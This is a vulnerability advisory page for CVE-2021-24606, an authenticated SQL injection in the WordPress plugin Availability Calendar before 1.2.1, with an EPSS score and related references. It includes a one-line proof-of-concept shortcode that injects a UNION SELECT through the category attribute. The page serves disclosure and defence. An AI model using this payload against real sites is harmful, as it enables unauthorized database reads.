Lucene search
HistoryAug 04, 2021 - 12:00 a.m.
Availability Calendar < 1.2.1 - Authenticated SQL Injection
0.001 Low
EPSS
Percentile
37.7%
The plugin does not escape the category attribute from its shortcode before using it in a SQL statement, leading to a SQL Injection issue, which can be exploited by any user able to add shortcode to posts/pages, such as contributor+
PoC
With an account role as low as contributor, put the following in a page/post: [availabilitycalendar category="1) UNION select user(),user(),user(),user(),user(),user(),user() – "]
| CPE | Name | Operator | Version |
|---|---|---|---|
| availability-calendar | lt | 1.2.1 |
Related
nvd
nvd
CVE-2021-24606
2021-09-20 10:15:08
cvelist
cvelist
CVE-2021-24606 Availability Calendar < 1.2.1 - Authenticated SQL Injection
2021-09-20 10:06:32
cve
cve
CVE-2021-24606
2021-09-20 10:15:08
prion
prion
Sql injection
2021-09-20 10:15:00
wpexploit
wpexploit
Availability Calendar < 1.2.1 - Authenticated SQL Injection
2021-08-04 00:00:00